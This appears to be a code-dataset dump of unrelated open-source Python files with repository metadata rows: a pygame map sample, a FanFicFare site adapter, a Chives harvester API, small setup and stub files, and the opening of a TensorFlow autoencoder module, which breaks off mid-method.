    actions.do_add(project, packages=["urllib3"], prerelease=True)
    assert working_set["urllib3"].version == "1.23b0"
    assert project.meta.dependencies[0] == "urllib3<2,>=1.23b0"
| 37.265233 | 88 | 0.697413 |
ace8eca1dd87624d63dbe8759de5ead3208e13b8 | 1,689 | py | Python | pygame_draw_state.py | sd16spring/us_map | 683290cf7838225a9323ef1c375ac3b535edca1b | [
"MIT"
] | null | null | null | pygame_draw_state.py | sd16spring/us_map | 683290cf7838225a9323ef1c375ac3b535edca1b | [
"MIT"
] | null | null | null | pygame_draw_state.py | sd16spring/us_map | 683290cf7838225a9323ef1c375ac3b535edca1b | [
"MIT"
] | null | null | null | """Sample code for `us_map.py`.
Author: Oliver Steele <oliver.steele@olin.edu>
License: MIT
Requirements:
sudo pip install BeautifulSoup
sudo pip install matplotlib
sudo pip install svg.path
"""
import pygame
import sys
import matplotlib.path
import us_map
# Colors (RGB tuples)
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
BLUE = (0, 0, 255)
GREEN = (0, 255, 0)
GRAY = (127, 127, 127)
LIGHT_GRAY = (191, 191, 191)
# Two-letter code of the state to draw -- assumed to be a key of
# us_map.states (used that way below).
STATE = 'CO'
# Window dimensions in pixels.
width, height = 640, 480
pygame.init()
screen = pygame.display.set_mode((width, height))
screen.fill(WHITE)
def point_in_polygon(pt, polygon):
    """Returns True iff `pt` is inside `polygon`.

    `pt` is an `(x, y)` pair; `polygon` is a list of tuples `(x, y)`.
    Delegates the containment test to matplotlib's Path."""
    return matplotlib.path.Path(polygon).contains_point(pt)
# Draw the polygons for the state (a state may consist of several
# disjoint polygons, e.g. islands).
for polygon in us_map.states[STATE]:
    # `polygon` points are tuples `(float, float)`. PyGame requires `(int, int)`.
    points = [(int(x), int(y)) for x, y in polygon]
    # Draw the interior
    pygame.draw.polygon(screen, BLUE, points)
    # Draw the boundary
    pygame.draw.polygon(screen, BLACK, points, 1)
# Present the finished frame.
pygame.display.flip()
last_mouse_in_state = False
# Event loop: exit on QUIT, otherwise track whether the mouse is inside
# the state and report transitions. (Python 2 print syntax.)
while True:
    if any(event.type == pygame.QUIT for event in pygame.event.get()):
        sys.exit()
    # Is the mouse inside the state?
    mouse_in_state = any(point_in_polygon(pygame.mouse.get_pos(), polygon) for polygon in us_map.states[STATE])
    # Only print a message if the mouse moved from the inside to the outside, or vice versa
    if mouse_in_state != last_mouse_in_state:
        last_mouse_in_state = mouse_in_state
        if mouse_in_state:
            print 'mouse in state'
        else:
            print 'mouse not in state'
| 25.208955 | 111 | 0.676732 |
ace8eca2038c34dcc8247d52cce452708f860fbd | 8,169 | py | Python | fanficfare/adapters/adapter_bloodshedversecom.py | smutandrea/FanFicFare | 56e91c1f73bd2444d7cf7adea9975b169692657d | [
"Apache-2.0"
] | 1 | 2020-08-27T03:49:02.000Z | 2020-08-27T03:49:02.000Z | fanficfare/adapters/adapter_bloodshedversecom.py | Hypernoc/FanFicFare | 869ed37137c82cd71ec589f36bc2001528d5e76c | [
"Apache-2.0"
] | null | null | null | fanficfare/adapters/adapter_bloodshedversecom.py | Hypernoc/FanFicFare | 869ed37137c82cd71ec589f36bc2001528d5e76c | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import
from datetime import timedelta
import re
import logging
logger = logging.getLogger(__name__)
from bs4 import BeautifulSoup
from ..htmlcleanup import stripHTML
# py2 vs py3 transition
from ..six import text_type as unicode
from ..six.moves.urllib import parse as urlparse
from ..six.moves.urllib.error import HTTPError
from .base_adapter import BaseSiteAdapter, makeDate
from .. import exceptions
def getClass():
    """Return the adapter class exported by this module."""
    return BloodshedverseComAdapter
def _get_query_data(url):
components = urlparse.urlparse(url)
query_data = urlparse.parse_qs(components.query)
return dict((key, data[0]) for key, data in query_data.items())
class BloodshedverseComAdapter(BaseSiteAdapter):
SITE_ABBREVIATION = 'bvc'
SITE_DOMAIN = 'bloodshedverse.com'
BASE_URL = 'https://' + SITE_DOMAIN + '/'
READ_URL_TEMPLATE = BASE_URL + 'stories.php?go=read&no=%s'
STARTED_DATETIME_FORMAT = '%m/%d/%Y'
UPDATED_DATETIME_FORMAT = '%m/%d/%Y %I:%M %p'
def __init__(self, config, url):
BaseSiteAdapter.__init__(self, config, url)
query_data = urlparse.parse_qs(self.parsedUrl.query)
story_no = query_data['no'][0]
self.story.setMetadata('storyId', story_no)
self._setURL(self.READ_URL_TEMPLATE % story_no)
self.story.setMetadata('siteabbrev', self.SITE_ABBREVIATION)
def _customized_fetch_url(self, url, exception=None, parameters=None):
if exception:
try:
data = self._fetchUrl(url, parameters)
except HTTPError:
raise exception(self.url)
# Just let self._fetchUrl throw the exception, don't catch and
# customize it.
else:
data = self._fetchUrl(url, parameters)
return self.make_soup(data)
@staticmethod
def getSiteDomain():
return BloodshedverseComAdapter.SITE_DOMAIN
@classmethod
def getSiteExampleURLs(cls):
return cls.READ_URL_TEMPLATE % 1234
def getSiteURLPattern(self):
return r'https?://' + re.escape(self.SITE_DOMAIN + '/stories.php?go=') + r'(read|chapters)\&(amp;)?no=\d+$'
# Override stripURLParameters so the "no" parameter won't get stripped
@classmethod
def stripURLParameters(cls, url):
return url
def extractChapterUrlsAndMetadata(self):
logger.debug("URL: "+self.url)
soup = self._customized_fetch_url(self.url)
# Since no 404 error code we have to raise the exception ourselves.
# A title that is just 'by' indicates that there is no author name
# and no story title available.
if stripHTML(soup.title) == 'by':
raise exceptions.StoryDoesNotExist(self.url)
for option in soup.find('select', {'name': 'chapter'}):
title = stripHTML(option)
url = self.READ_URL_TEMPLATE % option['value']
self.add_chapter(title, url)
# Reset the storyId to be the first chapter no. Needed
# because emails contain link to later chapters instead.
query_data = urlparse.parse_qs(self.get_chapter(0,'url'))
story_no = query_data['no'][0]
self.story.setMetadata('storyId', story_no)
self._setURL(self.READ_URL_TEMPLATE % story_no)
logger.info("updated storyId:%s"%story_no)
logger.info("updated storyUrl:%s"%self.url)
story_no = self.story.getMetadata('storyId')
# Get the URL to the author's page and find the correct story entry to
# scrape the metadata
author_url = urlparse.urljoin(self.url, soup.find('a', {'class': 'headline'})['href'])
soup = self._customized_fetch_url(author_url)
# Ignore first list_box div, it only contains the author information
for list_box in soup('div', {'class': 'list_box'})[1:]:
url = list_box.find('a', {'class': 'fictitle'})['href']
query_data = _get_query_data(url)
# Found the div containing the story's metadata; break the loop and
# parse the element
if query_data['no'] == story_no:
break
else:
raise exceptions.FailedToDownload(self.url)
title_anchor = list_box.find('a', {'class': 'fictitle'})
self.story.setMetadata('title', stripHTML(title_anchor))
author_anchor = title_anchor.findNextSibling('a')
self.story.setMetadata('author', stripHTML(author_anchor))
self.story.setMetadata('authorId', _get_query_data(author_anchor['href'])['who'])
self.story.setMetadata('authorUrl', urlparse.urljoin(self.url, author_anchor['href']))
list_review = list_box.find('div', {'class': 'list_review'})
reviews = stripHTML(list_review.a).split(' ', 1)[0]
self.story.setMetadata('reviews', reviews)
summary_div = list_box.find('div', {'class': 'list_summary'})
if not self.getConfig('keep_summary_html'):
summary = ''.join(summary_div(text=True))
else:
summary = self.utf8FromSoup(author_url, summary_div)
self.story.setMetadata('description', summary)
# I'm assuming this to be the category, not sure what else it could be
first_listinfo = list_box.find('div', {'class': 'list_info'})
self.story.addToList('category', stripHTML(first_listinfo.a))
for list_info in first_listinfo.findNextSiblings('div', {'class': 'list_info'}):
for b_tag in list_info('b'):
key = b_tag.string.strip(': ')
# Strip colons from the beginning, superfluous spaces and minus
# characters from the end, and possibly trailing commas from
# the warnings if only one is present
value = b_tag.nextSibling.string.strip(': -,')
if key == 'Genre':
for genre in value.split(', '):
# Ignore the "none" genre
if not genre == 'none':
self.story.addToList('genre', genre)
elif key == 'Rating':
self.story.setMetadata('rating', value)
elif key == 'Complete':
self.story.setMetadata('status', 'Completed' if value == 'Yes' else 'In-Progress')
elif key == 'Warning':
for warning in value.split(', '):
# The string here starts with ", " before the actual list
# of values sometimes, so check for an empty warning
# and ignore the "none" warning.
if not warning or warning == 'none':
continue
self.story.addToList('warnings', warning)
elif key == 'Chapters':
self.story.setMetadata('numChapters', int(value))
elif key == 'Words':
# Apparently only numChapters need to be an integer for
# some strange reason. Remove possible ',' characters as to
# not confuse the codebase down the line
self.story.setMetadata('numWords', value.replace(',', ''))
elif key == 'Started':
self.story.setMetadata('datePublished', makeDate(value, self.STARTED_DATETIME_FORMAT))
elif key == 'Updated':
date = makeDate(value, self.UPDATED_DATETIME_FORMAT)
# ugly %p(am/pm) hack moved into makeDate so other sites can use it.
self.story.setMetadata('dateUpdated', date)
if self.story.getMetadata('rating') == 'NC-17' and not (self.is_adult or self.getConfig('is_adult')):
raise exceptions.AdultCheckRequired(self.url)
def getChapterText(self, url):
    """Fetch one chapter page and return its story text as UTF-8 HTML.

    Args:
        url: absolute URL of the chapter page.

    Returns:
        The contents of the page's ``div.storytext`` element, processed
        through ``utf8FromSoup``.
    """
    soup = self._customized_fetch_url(url)
    storytext_div = soup.find('div', {'class': 'storytext'})
    # When configured, replace the site's in-text link anchors with their
    # plain link text so the output contains no navigation links.
    if self.getConfig('strip_text_links'):
        for anchor in storytext_div('a', {'class': 'FAtxtL'}):
            anchor.replaceWith(anchor.string)
    return self.utf8FromSoup(url, storytext_div)
| 39.84878 | 115 | 0.611948 |
ace8ed2b834e77636a17ad0ec1d29f39b10e5f67 | 103 | py | Python | uniseg/version.py | olivier-compilatio/uniseg-python | 8513a59e9c701a173c8001655e592c18f8840b16 | [
"MIT"
] | 2 | 2019-12-28T09:28:43.000Z | 2021-05-11T02:01:47.000Z | uniseg/version.py | olivier-compilatio/uniseg-python | 8513a59e9c701a173c8001655e592c18f8840b16 | [
"MIT"
] | null | null | null | uniseg/version.py | olivier-compilatio/uniseg-python | 8513a59e9c701a173c8001655e592c18f8840b16 | [
"MIT"
] | 2 | 2019-07-23T09:11:55.000Z | 2019-10-02T17:13:53.000Z | # NOTE: This file must not contain anything but the string literal of the
# software version!
'0.7.1'
| 25.75 | 74 | 0.737864 |
ace8ee8c4e1a508a65535615f261da5cab1935fa | 240 | py | Python | movo_common/movo_third_party/executive_smach_visualization/smach_viewer/setup.py | zkytony/kinova-movo | 37d7454b2dc589d44133f3913f567b9cc321a66d | [
"BSD-3-Clause"
] | 4 | 2021-01-23T18:35:43.000Z | 2021-12-26T09:03:53.000Z | movo_common/movo_third_party/executive_smach_visualization/smach_viewer/setup.py | ALAN-NUS/kinova_movo | 05a0451f5c563359ae0ffe3280e1df85caec9e55 | [
"BSD-3-Clause"
] | null | null | null | movo_common/movo_third_party/executive_smach_visualization/smach_viewer/setup.py | ALAN-NUS/kinova_movo | 05a0451f5c563359ae0ffe3280e1df85caec9e55 | [
"BSD-3-Clause"
] | 1 | 2020-01-21T11:05:24.000Z | 2020-01-21T11:05:24.000Z | #!/usr/bin/env python
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup

# Catkin-managed ROS package: setup arguments are derived from package.xml,
# with only the python package layout declared here.
d = generate_distutils_setup(
    packages=['smach_viewer', 'smach_viewer.xdot'],
    package_dir={'': 'src'}
)

setup(**d)
| 20 | 60 | 0.75 |
ace8eef7b4cd0f1607cfe12ec5e2515660e32dfe | 14,452 | py | Python | chives/harvester/harvester_api.py | zcomputerwiz/chives-light-wallet | b5f57f46bf4f804cc06a6e2bdf8cbde41bba2fe0 | [
"Apache-2.0"
] | null | null | null | chives/harvester/harvester_api.py | zcomputerwiz/chives-light-wallet | b5f57f46bf4f804cc06a6e2bdf8cbde41bba2fe0 | [
"Apache-2.0"
] | null | null | null | chives/harvester/harvester_api.py | zcomputerwiz/chives-light-wallet | b5f57f46bf4f804cc06a6e2bdf8cbde41bba2fe0 | [
"Apache-2.0"
] | 1 | 2022-03-20T16:19:04.000Z | 2022-03-20T16:19:04.000Z | import asyncio
import time
from pathlib import Path
from typing import Callable, List, Tuple
from blspy import AugSchemeMPL, G2Element, G1Element
from chives.consensus.pot_iterations import calculate_iterations_quality, calculate_sp_interval_iters
from chives.harvester.harvester import Harvester
from chives.plotting.util import PlotInfo, parse_plot_info
from chives.protocols import harvester_protocol
from chives.protocols.farmer_protocol import FarmingInfo
from chives.protocols.harvester_protocol import Plot
from chives.protocols.protocol_message_types import ProtocolMessageTypes
from chives.server.outbound_message import make_msg
from chives.server.ws_connection import WSChivesConnection
from chives.types.blockchain_format.proof_of_space import ProofOfSpace
from chives.types.blockchain_format.sized_bytes import bytes32
from chives.util.api_decorators import api_request, peer_required
from chives.util.ints import uint8, uint32, uint64
from chives.wallet.derive_keys import master_sk_to_local_sk
class HarvesterAPI:
    """Message handlers the harvester exposes to its peers (primarily the farmer)."""

    harvester: Harvester  # backing Harvester service all handlers delegate to

    def __init__(self, harvester: Harvester):
        self.harvester = harvester

    def _set_state_changed_callback(self, callback: Callable):
        # Forward state-change notifications from the harvester to the server layer.
        self.harvester.state_changed_callback = callback
    @api_request
    async def harvester_handshake(self, harvester_handshake: harvester_protocol.HarvesterHandshake):
        """
        Handshake between the harvester and farmer. The harvester receives the pool public keys,
        as well as the farmer pks, which must be put into the plots, before the plotting process begins.
        We cannot use any plots which have different keys in them.
        """
        self.harvester.plot_manager.set_public_keys(
            harvester_handshake.farmer_public_keys, harvester_handshake.pool_public_keys
        )
        # Plot refresh is only started once keys are known, since plots signed
        # with unknown keys cannot be used.
        self.harvester.plot_manager.start_refreshing()
    @peer_required
    @api_request
    async def new_signage_point_harvester(
        self, new_challenge: harvester_protocol.NewSignagePointHarvester, peer: WSChivesConnection
    ):
        """
        The harvester receives a new signage point from the farmer, this happens at the start of each slot.
        The harvester does a few things:
        1. The harvester applies the plot filter for each of the plots, to select the proportion which are eligible
        for this signage point and challenge.
        2. The harvester gets the qualities for each plot. This is approximately 7 reads per plot which qualifies.
        Note that each plot may have 0, 1, 2, etc qualities for that challenge: but on average it will have 1.
        3. Checks the required_iters for each quality and the given signage point, to see which are eligible for
        inclusion (required_iters < sp_interval_iters).
        4. Looks up the full proof of space in the plot for each quality, approximately 64 reads per quality
        5. Returns the proof of space to the farmer
        """
        if not self.harvester.plot_manager.public_keys_available():
            # This means that we have not received the handshake yet
            return None

        start = time.time()
        assert len(new_challenge.challenge_hash) == 32
        loop = asyncio.get_running_loop()

        def blocking_lookup(filename: Path, plot_info: PlotInfo) -> List[Tuple[bytes32, ProofOfSpace]]:
            # Uses the DiskProver object to lookup qualities. This is a blocking call,
            # so it should be run in a thread pool.
            try:
                plot_id = plot_info.prover.get_id()
                sp_challenge_hash = ProofOfSpace.calculate_pos_challenge(
                    plot_id,
                    new_challenge.challenge_hash,
                    new_challenge.sp_hash,
                )
                try:
                    quality_strings = plot_info.prover.get_qualities_for_challenge(sp_challenge_hash)
                except Exception as e:
                    self.harvester.log.error(f"Error using prover object {e}")
                    self.harvester.log.error(
                        f"File: (unknown) Plot ID: {plot_id.hex()}, "
                        f"challenge: {sp_challenge_hash}, plot_info: {plot_info}"
                    )
                    return []

                responses: List[Tuple[bytes32, ProofOfSpace]] = []
                if quality_strings is not None:
                    difficulty = new_challenge.difficulty
                    sub_slot_iters = new_challenge.sub_slot_iters
                    if plot_info.pool_contract_puzzle_hash is not None:
                        # If we are pooling, override the difficulty and sub slot iters with the pool threshold info.
                        # This will mean more proofs actually get found, but they are only submitted to the pool,
                        # not the blockchain
                        for pool_difficulty in new_challenge.pool_difficulties:
                            if pool_difficulty.pool_contract_puzzle_hash == plot_info.pool_contract_puzzle_hash:
                                difficulty = pool_difficulty.difficulty
                                sub_slot_iters = pool_difficulty.sub_slot_iters

                    # Found proofs of space (on average 1 is expected per plot)
                    for index, quality_str in enumerate(quality_strings):
                        required_iters: uint64 = calculate_iterations_quality(
                            self.harvester.constants.DIFFICULTY_CONSTANT_FACTOR,
                            quality_str,
                            plot_info.prover.get_size(),
                            difficulty,
                            new_challenge.sp_hash,
                        )
                        sp_interval_iters = calculate_sp_interval_iters(self.harvester.constants, sub_slot_iters)
                        if required_iters < sp_interval_iters:
                            # Found a very good proof of space! will fetch the whole proof from disk,
                            # then send to farmer
                            try:
                                proof_xs = plot_info.prover.get_full_proof(
                                    sp_challenge_hash, index, self.harvester.parallel_read
                                )
                            except Exception as e:
                                self.harvester.log.error(f"Exception fetching full proof for (unknown). {e}")
                                self.harvester.log.error(
                                    f"File: (unknown) Plot ID: {plot_id.hex()}, challenge: {sp_challenge_hash}, "
                                    f"plot_info: {plot_info}"
                                )
                                continue

                            responses.append(
                                (
                                    quality_str,
                                    ProofOfSpace(
                                        sp_challenge_hash,
                                        plot_info.pool_public_key,
                                        plot_info.pool_contract_puzzle_hash,
                                        plot_info.plot_public_key,
                                        uint8(plot_info.prover.get_size()),
                                        proof_xs,
                                    ),
                                )
                            )
                return responses
            except Exception as e:
                # Catch-all: a single bad plot must never take down the whole lookup pass.
                self.harvester.log.error(f"Unknown error: {e}")
                return []

        async def lookup_challenge(
            filename: Path, plot_info: PlotInfo
        ) -> Tuple[Path, List[harvester_protocol.NewProofOfSpace]]:
            # Executes a DiskProverLookup in a thread pool, and returns responses
            all_responses: List[harvester_protocol.NewProofOfSpace] = []
            if self.harvester._is_shutdown:
                return filename, []
            proofs_of_space_and_q: List[Tuple[bytes32, ProofOfSpace]] = await loop.run_in_executor(
                self.harvester.executor, blocking_lookup, filename, plot_info
            )
            for quality_str, proof_of_space in proofs_of_space_and_q:
                all_responses.append(
                    harvester_protocol.NewProofOfSpace(
                        new_challenge.challenge_hash,
                        new_challenge.sp_hash,
                        quality_str.hex() + str(filename.resolve()),
                        proof_of_space,
                        new_challenge.signage_point_index,
                    )
                )
            return filename, all_responses

        awaitables = []
        passed = 0   # plots that passed the plot filter
        total = 0    # plots whose file still exists on disk
        with self.harvester.plot_manager:
            for try_plot_filename, try_plot_info in self.harvester.plot_manager.plots.items():
                try:
                    if try_plot_filename.exists():
                        # Passes the plot filter (does not check sp filter yet though, since we have not reached sp)
                        # This is being executed at the beginning of the slot
                        total += 1
                        if ProofOfSpace.passes_plot_filter(
                            self.harvester.constants,
                            try_plot_info.prover.get_id(),
                            new_challenge.challenge_hash,
                            new_challenge.sp_hash,
                        ):
                            passed += 1
                            awaitables.append(lookup_challenge(try_plot_filename, try_plot_info))
                except Exception as e:
                    self.harvester.log.error(f"Error plot file {try_plot_filename} may no longer exist {e}")

        # Concurrently executes all lookups on disk, to take advantage of multiple disk parallelism
        total_proofs_found = 0
        for filename_sublist_awaitable in asyncio.as_completed(awaitables):
            filename, sublist = await filename_sublist_awaitable
            time_taken = time.time() - start
            if time_taken > 5:
                self.harvester.log.warning(
                    f"Looking up qualities on (unknown) took: {time_taken}. This should be below 5 seconds "
                    f"to minimize risk of losing rewards."
                )
            else:
                pass
                # If you want additional logs, uncomment the following line
                # self.harvester.log.debug(f"Looking up qualities on (unknown) took: {time_taken}")
            for response in sublist:
                total_proofs_found += 1
                msg = make_msg(ProtocolMessageTypes.new_proof_of_space, response)
                await peer.send_message(msg)

        now = uint64(int(time.time()))
        farming_info = FarmingInfo(
            new_challenge.challenge_hash,
            new_challenge.sp_hash,
            now,
            uint32(passed),
            uint32(total_proofs_found),
            uint32(total),
        )
        pass_msg = make_msg(ProtocolMessageTypes.farming_info, farming_info)
        await peer.send_message(pass_msg)
        self.harvester.log.info(
            f"{len(awaitables)} plots were eligible for farming {new_challenge.challenge_hash.hex()[:10]}..."
            f" Found {total_proofs_found} proofs. Time: {time.time() - start:.5f} s. "
            f"Total {self.harvester.plot_manager.plot_count()} plots"
        )
    @api_request
    async def request_signatures(self, request: harvester_protocol.RequestSignatures):
        """
        The farmer requests a signature on the header hash, for one of the proofs that we found.
        A signature is created on the header hash using the harvester private key. This can also
        be used for pooling.
        """
        # plot_identifier is quality-string hex (64 chars) + plot file path.
        plot_filename = Path(request.plot_identifier[64:]).resolve()
        with self.harvester.plot_manager:
            try:
                plot_info = self.harvester.plot_manager.plots[plot_filename]
            except KeyError:
                self.harvester.log.warning(f"KeyError plot {plot_filename} does not exist.")
                return None

            # Look up local_sk from plot to save locked memory
            (
                pool_public_key_or_puzzle_hash,
                farmer_public_key,
                local_master_sk,
            ) = parse_plot_info(plot_info.prover.get_memo())
            local_sk = master_sk_to_local_sk(local_master_sk)

            # Pool-contract plots (puzzle hash in the memo) require the taproot
            # tweak when deriving the aggregate plot public key.
            if isinstance(pool_public_key_or_puzzle_hash, G1Element):
                include_taproot = False
            else:
                assert isinstance(pool_public_key_or_puzzle_hash, bytes32)
                include_taproot = True

            agg_pk = ProofOfSpace.generate_plot_public_key(local_sk.get_g1(), farmer_public_key, include_taproot)

            # This is only a partial signature. When combined with the farmer's half, it will
            # form a complete PrependSignature.
            message_signatures: List[Tuple[bytes32, G2Element]] = []
            for message in request.messages:
                signature: G2Element = AugSchemeMPL.sign(local_sk, message, agg_pk)
                message_signatures.append((message, signature))

            response: harvester_protocol.RespondSignatures = harvester_protocol.RespondSignatures(
                request.plot_identifier,
                request.challenge_hash,
                request.sp_hash,
                local_sk.get_g1(),
                farmer_public_key,
                message_signatures,
            )

            return make_msg(ProtocolMessageTypes.respond_signatures, response)
    @api_request
    async def request_plots(self, _: harvester_protocol.RequestPlots):
        """Report all loaded plots, plus files that failed to open or had no usable keys."""
        plots_response = []
        plots, failed_to_open_filenames, no_key_filenames = self.harvester.get_plots()
        for plot in plots:
            plots_response.append(
                Plot(
                    plot["filename"],
                    plot["size"],
                    plot["plot_id"],
                    plot["pool_public_key"],
                    plot["pool_contract_puzzle_hash"],
                    plot["plot_public_key"],
                    plot["file_size"],
                    plot["time_modified"],
                )
            )

        response = harvester_protocol.RespondPlots(plots_response, failed_to_open_filenames, no_key_filenames)
        return make_msg(ProtocolMessageTypes.respond_plots, response)
| 48.824324 | 117 | 0.590991 |
ace8eefd93cf2c2299e5a2aca3aac6b3a99efd10 | 262 | py | Python | norden/norden/doctype/ds_smart_analytics/ds_smart_analytics.py | thispl/norden | 2a208056e948cae42da688e28c15024124254867 | [
"MIT"
] | null | null | null | norden/norden/doctype/ds_smart_analytics/ds_smart_analytics.py | thispl/norden | 2a208056e948cae42da688e28c15024124254867 | [
"MIT"
] | null | null | null | norden/norden/doctype/ds_smart_analytics/ds_smart_analytics.py | thispl/norden | 2a208056e948cae42da688e28c15024124254867 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2021, Teampro and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
from frappe.model.document import Document
class DSSmartAnalytics(Document):
pass
| 23.818182 | 49 | 0.778626 |
ace8ef7d53a23a4b0e661042b19f757c3f6c5bd3 | 48,150 | py | Python | src/tf_model.py | stewarthe6/NCI-DOE-Collab-Pilot1-Semi-Supervised-Feature-Learning-with-Center-Loss | db63415daa684eaadeefd6845032d8a86608b79e | [
"MIT"
] | null | null | null | src/tf_model.py | stewarthe6/NCI-DOE-Collab-Pilot1-Semi-Supervised-Feature-Learning-with-Center-Loss | db63415daa684eaadeefd6845032d8a86608b79e | [
"MIT"
] | null | null | null | src/tf_model.py | stewarthe6/NCI-DOE-Collab-Pilot1-Semi-Supervised-Feature-Learning-with-Center-Loss | db63415daa684eaadeefd6845032d8a86608b79e | [
"MIT"
] | 1 | 2021-08-11T16:20:16.000Z | 2021-08-11T16:20:16.000Z | from __future__ import division, print_function, absolute_import
import tensorflow as tf
from tf_layers import *
from tf_selu import selu
import math
def getNetwork(t):
    """Resolve a network type tag to its model class.

    Args:
        t: string tag naming one of the autoencoder/regressor architectures
           defined in this module (e.g. 'wide', 'ecfp_selu', 'rnaseq_selu_big').

    Returns:
        The matching class object, or None (after logging a message) when the
        tag is not recognized.
    """
    print("using AE", t)
    # Single elif chain: the original repeated-`if` version also contained a
    # duplicate, unreachable check for 'rnaseq_selu_big'; removed here.
    if t == 'wide':
        return Regression_Wide
    elif t == 'encoded':
        return Regression_Encoded
    elif t == 'chem':
        return AutoEncoder_Chem
    elif t == 'sig':
        return AutoEncoder_Chem_Sigmoid
    elif t == 'ecfp':
        return AutoEncoder_Chem_ECFP
    elif t == 'ecfp_sig':
        return AutoEncoder_Chem_ECFP_sig
    elif t == 'ecfp_sig_bn':
        return AutoEncoder_Chem_ECFP_sig_bn
    elif t == 'flat':
        return AutoEncoder_Chem_Flat
    elif t == 'ecfp_two':
        return AutoEncoder_ECFP_Two
    elif t == 'ecfp_three':
        return AutoEncoder_ECFP_Three
    elif t == 'ecfp_five':
        return AutoEncoder_ECFP_Five
    elif t == 'ecfp_three_bn':
        return AutoEncoder_ECFP_Three_BN
    elif t == 'ecfp_skinny_bn':
        return AutoEncoder_ECFP_Skinny_BN
    elif t == 'ecfp_selu':
        return AutoEncoder_ECFP_SELU
    elif t == 'ecfp_selu_five':
        return AutoEncoder_ECFP_SELU_Five
    elif t == 'ecfp_selu_two':
        return AutoEncoder_ECFP_SELU_Two
    elif t == 'rnaseq_selu':
        return RNASEQ_SELU
    elif t == 'rnaseq_selu_big':
        return RNASEQ_SELU_big
    elif t == 'rnaseq_relu_big':
        return RNASEQ_RELU_big
    elif t == 'rnaseq_sig_big':
        return RNASEQ_Sig_big
    elif t == 'rnaseq_selu_bigger':
        return RNASEQ_SELU_bigger
    elif t == 'rnaseq_selu_sq':
        return RNASEQ_SELU_sq
    elif t == 'rnaseq_selu_1k':
        return RNASEQ_SELU_1k
    elif t == 'rnaseq_sq':
        return RNASEQ_sq
    elif t == 'lbexp_selu':
        return LBEXP_SELU
    elif t == 'lbexp_relu':
        return LBEXP_RELU
    elif t == 'tox_relu':
        return TOX_RELU
    elif t == 'tox_relu_reg':
        return TOX_RELU_REG
    elif t == 'fang_relu_dragon':
        return FANG_RELU_DRAGON
    elif t == 'fang_relu_gene':
        return FANG_RELU_GENE
    print("unrecognized autoencoder type", t)
    return None
class Regression_Wide:
    """Batch-normalized MLP regressor (2000-500-100 hidden units, 1 linear output)."""

    def __init__(self, numFeatures, is_training=True):
        # self.width is how many features make up the input/output
        self.width = numFeatures
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x):
        test = not self.is_training  # batch-norm uses running stats at test time
        fc1 = batch_normalized_linear_layer(x, "fc1", 2000, stddev=1, wd=.004, test=test)
        fc2 = batch_normalized_linear_layer(fc1, "fc2", 500, stddev=1, wd=.004, test=test)
        fc3 = batch_normalized_linear_layer(fc2, "fc3", 100, stddev=1, wd=.004, test=test)
        fc3_out = linear_layer(fc3, 'fc3_out', 1, stddev=1, wd=.004, nonlinearity=None)
        return fc3_out
class Regression_Encoded:
    """Single linear regression head on top of an already-encoded representation."""

    def __init__(self, numFeatures, is_training=True):
        # self.width is how many features make up the input/output
        self.width = numFeatures
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x):
        test = not self.is_training  # NOTE(review): unused; kept for interface symmetry
        # Earlier (disabled) deeper variants:
        #fc1 = batch_normalized_linear_layer(x, "fc1", 50, stddev=1, wd=.004, test=test)
        #fc2 = batch_normalized_linear_layer(x, "fc2", 25, stddev=1, wd=.004, test=test)
        #fc3 = batch_normalized_linear_layer(fc2, "fc3", 12, stddev=1, wd=.004, test=test)
        fc3_out = linear_layer(x, 'fc3_out', 1, stddev=1, wd=.004, nonlinearity=None)
        return fc3_out
class AutoEncoder_Chem_Sigmoid:
    """Sigmoid-activated autoencoder: width-2000-500-100 bottleneck and mirror decoder."""

    def __init__(self, numFeatures, is_training=True):
        # self.width is how many features make up the input/output
        print("using the correct AE class")
        self.width = numFeatures
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x):
        test = not self.is_training  # NOTE(review): unused; no batch-norm in this variant
        fc1 = linear_layer(x, "fc1", 2000, stddev=.005, wd=.004, nonlinearity=tf.sigmoid)
        fc2 = linear_layer(fc1, "fc2", 500, stddev=.005, wd=.004, nonlinearity=tf.sigmoid)
        # NOTE(review): layer name "fc3_3" looks like a typo for "fc3_out", but renaming
        # would invalidate existing checkpoints, so it is left unchanged.
        fc3_out = linear_layer(fc2, "fc3_3", 100, stddev=.005, wd=.004, nonlinearity=tf.sigmoid)
        return fc3_out

    # Building the decoder
    def decoder(self, x):
        test = not self.is_training
        de_fc1 = linear_layer(x, "de_fc1", 500, stddev=.005, wd=.004, nonlinearity=tf.sigmoid)
        de_fc2 = linear_layer(de_fc1, "de_fc2", 2000, stddev=.005, wd=.004, nonlinearity=tf.sigmoid)
        de_fc3_out = linear_layer(de_fc2, 'de_fc3_out', self.width, stddev=.005, wd=.004)
        return de_fc3_out
class AutoEncoder_Chem:
    """Batch-normalized autoencoder: width-2000-500-100 bottleneck and mirror decoder."""

    def __init__(self, numFeatures, is_training=True):
        # self.width is how many features make up the input/output
        self.width = numFeatures
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x):
        test = not self.is_training  # batch-norm uses running stats at test time
        fc1 = batch_normalized_linear_layer(x, "fc1", 2000, stddev=.005, wd=.004, test=test)
        fc2 = batch_normalized_linear_layer(fc1, "fc2", 500, stddev=.005, wd=.004, test=test)
        # NOTE(review): layer name "fc3_3" looks like a typo for "fc3_out"; kept for
        # checkpoint compatibility.
        fc3_out = linear_layer(fc2, "fc3_3", 100, stddev=.005, wd=.004)
        return fc3_out

    # Building the decoder
    def decoder(self, x):
        test = not self.is_training
        de_fc1 = batch_normalized_linear_layer(x, "de_fc1", 500, stddev=.005, wd=.004, test=test)
        de_fc2 = batch_normalized_linear_layer(de_fc1, "de_fc2", 2000, stddev=.005, wd=.004, test=test)
        de_fc3_out = linear_layer(de_fc2, 'de_fc3_out', self.width, stddev=.005, wd=.004)
        return de_fc3_out
class AutoEncoder_Chem_Flat:
    """Single-hidden-layer ("flat") autoencoder: width-100-width."""

    def __init__(self, numFeatures, is_training=True):
        # self.width is how many features make up the input/output
        print("using flat network")
        self.width = numFeatures
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x):
